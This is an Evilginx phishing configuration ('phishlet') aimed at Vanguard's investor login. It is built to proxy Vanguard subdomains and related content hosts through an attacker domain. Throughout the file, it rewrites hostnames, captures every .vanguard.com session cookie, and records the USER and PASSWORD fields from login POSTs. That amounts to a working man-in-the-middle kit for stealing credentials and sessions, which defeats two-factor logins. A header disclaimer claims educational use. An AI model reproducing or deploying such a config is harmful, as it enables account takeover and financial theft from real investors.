# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
# PLEASE DO NOT MISUSE THIS PHISHLET.

# Don't Forget To set "domain" Params to your domain name (example.com)...
# This will bw shown in login window header.
#
# Use This Command To set the domain params from the evilginx command line.
# Where ID is lure id number, and EXAMPLE.COM is your domain name.
# lures edit params ID domain=EXAMPLE.COM
 

author: '@An0nud4y'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'investor', orig_sub: 'investor', domain: 'vanguard.com', session: true, is_landing: true}
  - {phish_sub: 'personal', orig_sub: 'personal', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: 'logon', orig_sub: 'logon', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: 'api.cf.opsp.c1', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: '', orig_sub: '', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: 'apps', orig_sub: 'apps', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: 'eus', orig_sub: 'eus', domain: 'vanguard.com', session: true, is_landing: false}
  - {phish_sub: 'ccc', orig_sub: 'ccc', domain: 'vgcontent.info', session: true, is_landing: false}
  - {phish_sub: 'static-c1a', orig_sub: 'static-c1a', domain: 'vgcontent.info', session: true, is_landing: false}
  - {phish_sub: 'static', orig_sub: 'static', domain: 'vgcontent.info', session: true, is_landing: false}
  - {phish_sub: 'pdx-col', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', session: true, is_landing: false}

sub_filters:
  - {triggers_on: 'investor.vanguard.com', orig_sub: '', domain: 'vanguard.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'investor.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'api.cf.opsp.c1.', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'investor.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'logon.vanguard.com', orig_sub: '', domain: 'vanguard.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'logon.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'api.cf.opsp.c1.', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'logon.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'personal.vanguard.com', orig_sub: '', domain: 'vanguard.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

  - {triggers_on: 'personal.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'investor', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'personal', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'logon', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'api.cf.opsp.c1.', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'api.cf.opsp.c1', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'apps', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'eus', domain: 'vanguard.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'ccc', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static-c1a', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'static', domain: 'vgcontent.info', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'personal.vanguard.com', orig_sub: 'pdx-col', domain: 'eum-appdynamics.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']}

auth_tokens:
  - domain: '.vanguard.com'
    keys: ['.*,regexp']
auth_urls:
  - '/.*'
  - '/MyHome.*'    
credentials:
  username:
    key: 'USER'
    search: '(.*)'
    type: 'post'
  password:
    key: 'PASSWORD'
    search: '(.*)'
    type: 'post'
     
login:
  domain: 'investor.vanguard.com'
  path: '/my-account/log-on'
